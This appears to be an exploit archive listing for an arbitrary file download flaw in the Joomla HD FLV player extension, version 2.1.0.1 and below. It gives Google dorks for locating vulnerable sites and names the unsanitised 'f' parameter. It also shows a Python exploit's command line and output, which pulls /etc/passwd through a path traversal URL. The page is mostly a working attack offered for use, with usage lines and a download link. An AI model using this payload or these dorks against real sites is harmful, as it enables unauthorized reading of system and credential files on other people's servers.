Info
# Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info:
# Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
# The variable "f" is not sanitized.
# Over 80.000 downloads (statistic reported on official site)
Exploit Preview
claudio@backbox3:~/claudio$ python j00m_hd_flv_afd.py -t http://target -f /etc/passwd
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \
|___| | _ | _ | | | _ | |. 1 |. | \
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Searching HD FLV Extension...: FOUND
[+] Checking Version: 2.1.0.1
[+] Exploiting...please wait: ######
[!] VULNERABLE
[*] 3v1l Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../../../..//etc/passwd
[+] Do you want [D]ownload or [R]ead the file?
[+]
[+] Please respond with 'D' or 'R': d
[!] DOWNLOADED!
[!] Check file: passwd
Download
Download Exploit: HERE
Exploit Usage
claudio@backbox3:~$ python j00m_hd_flv_afd.py -t http[s]://localhost[:PORT] -f filname
python j00m_hd_flv_afd.py -t http[s]://localhost[:PORT]/basedir -f filename